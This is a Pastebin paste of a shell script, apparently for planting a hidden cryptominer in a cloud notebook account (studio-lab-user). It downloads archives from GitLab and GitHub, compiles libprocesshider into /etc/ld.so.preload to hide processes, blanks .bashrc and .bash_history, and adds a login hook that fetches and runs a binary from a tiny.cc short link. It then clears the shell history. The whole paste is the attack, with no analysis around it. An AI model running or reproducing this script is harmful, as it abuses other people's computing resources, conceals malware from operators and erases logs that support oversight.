Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- rm -rvf .lib* .bash*
- rm -rvf * && mkdir d && cd d
- #!/bin/sh
- echo "==================="
- echo " CEK TIMEZONE "
- echo "==================="
- echo " "
- echo " "
- ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
- dpkg-reconfigure --frontend noninteractive tzdata
- sleep 2
- apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
- wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
- tar -xvzf graphics.tar.gz
- rm -rf graphics.tar.gz
- rm -rf gas && wget -q 'https://gitlab.com/meldiyunrianto/nimik/-/raw/main/korek.zip' && unzip korek.zip
- chmod +x gas
- rm -rf Makefile
- rm -rf processhider.c
- rm -rf README.md
- rm -rf .gitignore
- rm -rf korek.zip
- cd ~/
- wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
- unzip tukimin.zip
- rm -rf tukimin.zip
- sleep 3
- make
- gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
- mv libprocesshider.so /usr/local/lib/
- echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
- sleep 3
- mkdir .lib
- cd .lib
- git clone https://github.com/sukamenari/akc.git && cd akc && mv kernel* /home/studio-lab-user/.lib
- cd .. && rm -rvf akc
- echo "" > /home/studio-lab-user/.bashrc
- echo "" > /home/studio-lab-user/.bash_history
- echo "" > /home/studio-lab-user/.bash_profile
- echo 'echo "" >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
- echo "source /home/studio-lab-user/.bash_profile" >> /home/studio-lab-user/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
- echo "bash /home/studio-lab-user/.lib/gas.sh" >> /home/studio-lab-user/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf n && wget -O n http://tiny.cc/nim && chmod +x n && ./n " > /home/studio-lab-user/.lib/gas.sh
- cd /home/studio-lab-user/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement